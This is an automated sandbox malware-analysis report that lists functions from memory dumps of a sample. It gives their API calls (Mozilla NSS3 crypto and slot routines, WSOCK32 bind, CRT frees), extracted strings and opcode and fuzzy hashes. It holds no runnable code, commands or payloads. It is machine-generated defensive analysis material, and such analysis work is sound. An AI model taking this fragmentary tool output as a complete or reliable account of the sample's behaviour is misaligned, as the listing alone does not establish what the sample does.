API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6C306410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C306401,?,?,0000001C), ref: 6C306422
WSAGetLastError.WSOCK32(?,?,?,?,6C306401,?,?,0000001C), ref: 6C306432

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: 0b8e13d26e9b4b5a7187d218417e5541f71e6a7e5bd95de8e0181d2dc1db0a88
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 6AE01D362501146FCF05DF74DC45C7A37A9DF4822C790C524F919C76B1EA35D5658BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6C3E0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ffb4ece94aa5c7601ba860dcf46370291093adf0e7d9edc5be2f409cfd69fc5
Instruction ID: 3b956682fe59d55e230a7bdc2e25143081fba7bb2f0c9071d31c9a9830439643
Opcode Fuzzy Hash: 9ffb4ece94aa5c7601ba860dcf46370291093adf0e7d9edc5be2f409cfd69fc5
Instruction Fuzzy Hash: 9D11C1747043599FCB00EF29C8C066A77B5FF89368F14806AD8198F701DB72E806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C3544C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673e5c2d2e319813d6f4ce89e6577dfed71d287edd2526c0cf0e1aecbac37c16
Instruction ID: 5f8d63df1bd16ddff4ef17360cfebefeb347681f949bd73474d9407ebd5e660f
Opcode Fuzzy Hash: 673e5c2d2e319813d6f4ce89e6577dfed71d287edd2526c0cf0e1aecbac37c16
Instruction Fuzzy Hash: 2A1109B6E002199F8B00DF99D8809EFBBF9EF8C664B554429ED58E7300D231ED118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C354440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f78737c1e639d82cdf58bad2c0ecaa6bd422971e67329f87c5c926c6386f58
Instruction ID: a1b145419b59782381c8ba3a7fb1e907117a047f0aa34523f7eb8608b1b0a58c
Opcode Fuzzy Hash: f4f78737c1e639d82cdf58bad2c0ecaa6bd422971e67329f87c5c926c6386f58
Instruction Fuzzy Hash: 2C11C976A002199F9B00DF59C8809EFB7F9EF4C214B56416AED58E7301D631ED118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C3E0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 09228e5aedd1eda5b7ba5b8c414a5f77f87e3b02855552e7e79ca2326dcd3ef1
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 88E06D3A202064A7DB148E09C450AAA7369DF89619FE4807ACC999BB01DA73F8039B91

Uniqueness

Uniqueness Score: -1.00%

Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041953E

Part of subcall function 00417247: HeapFree.KERNEL32(00000000,00000000,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041725D
Part of subcall function 00417247: GetLastError.KERNEL32(?,?,00417158,00000000,00421AC0,0041719F,?,?,?,0041720F,00421AC0,?,?,00419FD3,00421AC0), ref: 0041726F

_free.LIBCMT ref: 00419546
_free.LIBCMT ref: 0041954E
_free.LIBCMT ref: 00419556
_free.LIBCMT ref: 0041955E
_free.LIBCMT ref: 00419566
_free.LIBCMT ref: 0041956D
_free.LIBCMT ref: 00419575
_free.LIBCMT ref: 0041957D
_free.LIBCMT ref: 00419585
_free.LIBCMT ref: 0041958D
_free.LIBCMT ref: 00419595
_free.LIBCMT ref: 0041959D
_free.LIBCMT ref: 004195A5
_free.LIBCMT ref: 004195AD
_free.LIBCMT ref: 004195B5
_free.LIBCMT ref: 004195C0
_free.LIBCMT ref: 004195C8
_free.LIBCMT ref: 004195D0
_free.LIBCMT ref: 004195D8
_free.LIBCMT ref: 004195E0
_free.LIBCMT ref: 004195E8
_free.LIBCMT ref: 004195F0
_free.LIBCMT ref: 004195F8
_free.LIBCMT ref: 00419600
_free.LIBCMT ref: 00419608
_free.LIBCMT ref: 00419610
_free.LIBCMT ref: 00419618
_free.LIBCMT ref: 00419620
_free.LIBCMT ref: 00419628
_free.LIBCMT ref: 00419630
_free.LIBCMT ref: 00419638
_free.LIBCMT ref: 00419646
_free.LIBCMT ref: 00419651
_free.LIBCMT ref: 0041965C
_free.LIBCMT ref: 00419667
_free.LIBCMT ref: 00419672
_free.LIBCMT ref: 0041967D
_free.LIBCMT ref: 00419688
_free.LIBCMT ref: 00419693
_free.LIBCMT ref: 0041969E
_free.LIBCMT ref: 004196A9
_free.LIBCMT ref: 004196B4
_free.LIBCMT ref: 004196BF
_free.LIBCMT ref: 004196CA
_free.LIBCMT ref: 004196D5
_free.LIBCMT ref: 004196E0
_free.LIBCMT ref: 004196EB
_free.LIBCMT ref: 004196F9
_free.LIBCMT ref: 00419704
_free.LIBCMT ref: 0041970F
_free.LIBCMT ref: 0041971A
_free.LIBCMT ref: 00419725
_free.LIBCMT ref: 00419730
_free.LIBCMT ref: 0041973B
_free.LIBCMT ref: 00419746
_free.LIBCMT ref: 00419751
_free.LIBCMT ref: 0041975C
_free.LIBCMT ref: 00419767
_free.LIBCMT ref: 00419772
_free.LIBCMT ref: 0041977D
_free.LIBCMT ref: 00419788
_free.LIBCMT ref: 00419793
_free.LIBCMT ref: 0041979E
_free.LIBCMT ref: 004197AC
_free.LIBCMT ref: 004197B7
_free.LIBCMT ref: 004197C2
_free.LIBCMT ref: 004197CD
_free.LIBCMT ref: 004197D8
_free.LIBCMT ref: 004197E3
_free.LIBCMT ref: 004197EE
_free.LIBCMT ref: 004197F9
_free.LIBCMT ref: 00419804
_free.LIBCMT ref: 0041980F
_free.LIBCMT ref: 0041981A
_free.LIBCMT ref: 00419825
_free.LIBCMT ref: 00419830
_free.LIBCMT ref: 0041983B
_free.LIBCMT ref: 00419846
_free.LIBCMT ref: 00419851
_free.LIBCMT ref: 0041985F
_free.LIBCMT ref: 0041986A
_free.LIBCMT ref: 00419875
_free.LIBCMT ref: 00419880
_free.LIBCMT ref: 0041988B
_free.LIBCMT ref: 00419896

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59

Uniqueness

Uniqueness Score: -1.00%

Function 6C374C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374C5B
PR_smprintf.NSS3(6C44AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C374CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C374CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C374D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C364F51,00000000), ref: 6C374D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C374D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C374DA2
free.MOZGLUE(?), ref: 6C374DB9
free.MOZGLUE(00000000), ref: 6C374DCF

Strings

slotFlags, xrefs: 6C374D34
%s,%s, xrefs: 6C374C4B
ootT, xrefs: 6C374D1A
every, xrefs: 6C374CA1
timeout, xrefs: 6C374C91
any, xrefs: 6C374C96
rust, xrefs: 6C374D22
0x%08lx=[%s %s], xrefs: 6C374D80
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C374D9D
rootFlags, xrefs: 6C374D47

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 607222da188067d011712df47a989fde7a6703b1f1d68de2604eed1878a83e25
Instruction ID: 5a5b1eef4df2bf1ea905e2cbc59fe0b03fbf2a31798794b112bcf5419c020562
Opcode Fuzzy Hash: 607222da188067d011712df47a989fde7a6703b1f1d68de2604eed1878a83e25
Instruction Fuzzy Hash: B6418FB1910185A7EB22EF159C81EBA7A69AF8230CF158124EC1557702E73AE914CFF7

Uniqueness

Uniqueness Score: -1.00%

Function 6C356CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C356910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C356943
Part of subcall function 6C356910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C356957
Part of subcall function 6C356910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C356972
Part of subcall function 6C356910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C356983
Part of subcall function 6C356910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C3569AA
Part of subcall function 6C356910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C3569BE
Part of subcall function 6C356910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C3569D2
Part of subcall function 6C356910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C3569DF
Part of subcall function 6C356910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C356A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C356D8C
free.MOZGLUE(00000000), ref: 6C356DC5
free.MOZGLUE(?), ref: 6C356DD6
free.MOZGLUE(?), ref: 6C356DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C356E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356E72
free.MOZGLUE(?), ref: 6C356EA7
free.MOZGLUE(?), ref: 6C356EC4
free.MOZGLUE(?), ref: 6C356ED5
free.MOZGLUE(00000000), ref: 6C356EE3
free.MOZGLUE(?), ref: 6C356EF4
free.MOZGLUE(?), ref: 6C356F08
free.MOZGLUE(00000000), ref: 6C356F35
free.MOZGLUE(?), ref: 6C356F44
free.MOZGLUE(?), ref: 6C356F5B
free.MOZGLUE(00000000), ref: 6C356F65

Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C35781D,00000000,6C34BE2C,?,6C356B1D,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C40
Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C35781D,?,6C34BE2C,?), ref: 6C356C58
Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C6F
Part of subcall function 6C356C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C356C84
Part of subcall function 6C356C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C356C96
Part of subcall function 6C356C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C356CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C356FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C356FF4

Strings

+`6l, xrefs: 6C356D0D

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`6l
API String ID: 1304971872-3552083973
Opcode ID: df9bd685f1f8f2181a785efa04bfcfaddd8e9ac072d3e0a74eb4b65b2cc6982f
Instruction ID: e9a3633eecbaa04c5a5795efef6abd2312cb99f947af01a8d0f713c3ffd3ad41
Opcode Fuzzy Hash: df9bd685f1f8f2181a785efa04bfcfaddd8e9ac072d3e0a74eb4b65b2cc6982f
Instruction Fuzzy Hash: 07B16DB0E022099FEF00DBA5D985F9EBBB8AF05348F540124E815E7741E732E924CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C352D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C352DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C352E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C352E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C352E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C324F1C,?,-00000001,00000000,?), ref: 6C352E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C324F1C,?,-00000001,00000000), ref: 6C352E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C352EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C352EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C352EF8
PR_Unlock.NSS3(?), ref: 6C352F62
TlsGetValue.KERNEL32 ref: 6C352F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C352F9E
PR_Unlock.NSS3(?), ref: 6C352FCA
TlsGetValue.KERNEL32 ref: 6C35301A
EnterCriticalSection.KERNEL32(?), ref: 6C35302E
PR_Unlock.NSS3(?), ref: 6C353066
PR_SetError.NSS3(00000000,00000000), ref: 6C353085
PR_Unlock.NSS3(?), ref: 6C3530EC
TlsGetValue.KERNEL32 ref: 6C35310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C353124
PR_Unlock.NSS3(?), ref: 6C35314C

Part of subcall function 6C339180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C36379E,?,6C339568,00000000,?,6C36379E,?,00000001,?), ref: 6C33918D
Part of subcall function 6C339180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C36379E,?,6C339568,00000000,?,6C36379E,?,00000001,?), ref: 6C3391A0

Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007AD
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007CD
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007D6
Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C29204A), ref: 6C3007E4
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,6C29204A), ref: 6C300864
Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C300880
Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,6C29204A), ref: 6C3008CB
Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008D7
Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008FB

PR_SetError.NSS3(00000000,00000000), ref: 6C35316D

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 8effb218172725647a6a73da12e7e60d453b29c06bcb7039cc8453ece9dcdd73
Instruction ID: 6f255e2c1ef2ab9f10e7af7e1ac62b21b624b004a6e1096e774a55b75bacdd63
Opcode Fuzzy Hash: 8effb218172725647a6a73da12e7e60d453b29c06bcb7039cc8453ece9dcdd73
Instruction Fuzzy Hash: 51F19DB1E002189FDF00EF64D884BAABBB4BF09318F544169EC45A7711E732A9A5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C346D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C346D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C346DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C346DC3

Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963

PR_LogPrint.NSS3(?,00000000), ref: 6C346DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C346DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C346E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C346E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C346E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C346EB9

Strings

pulDigestLen = 0x%p, xrefs: 6C346E42
C_Digest, xrefs: 6C346D81
(CK_INVALID_HANDLE), xrefs: 6C346DBC
hSession = 0x%x, xrefs: 6C346D9E, 6C346DAE
*pulDigestLen = 0x%x, xrefs: 6C346EB4
nBl, xrefs: 6C346E61, 6C346E95
pDigest = 0x%p, xrefs: 6C346E27
ulDataLen = %d, xrefs: 6C346E0E
pData = 0x%p, xrefs: 6C346DF5

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nBl
API String ID: 1003633598-4108049304
Opcode ID: f49ab2d08792df6e73b87633e1b7e7cdda7c32002b26211b5619587798883db9
Instruction ID: e9828adf1127d3fb8bf4f17dc59e1d1caabdaf7c2ccdef53ee6d68e197f8cccf
Opcode Fuzzy Hash: f49ab2d08792df6e73b87633e1b7e7cdda7c32002b26211b5619587798883db9
Instruction Fuzzy Hash: 4B41A175601164EFDB11EF55DD49F8A3BF5EB8631CF048028E909A7A12DB319858CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C354C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C354C4C
EnterCriticalSection.KERNEL32(?), ref: 6C354C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C354CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C354CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C354CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C354D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C354D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C354DB7

Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4

Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007AD
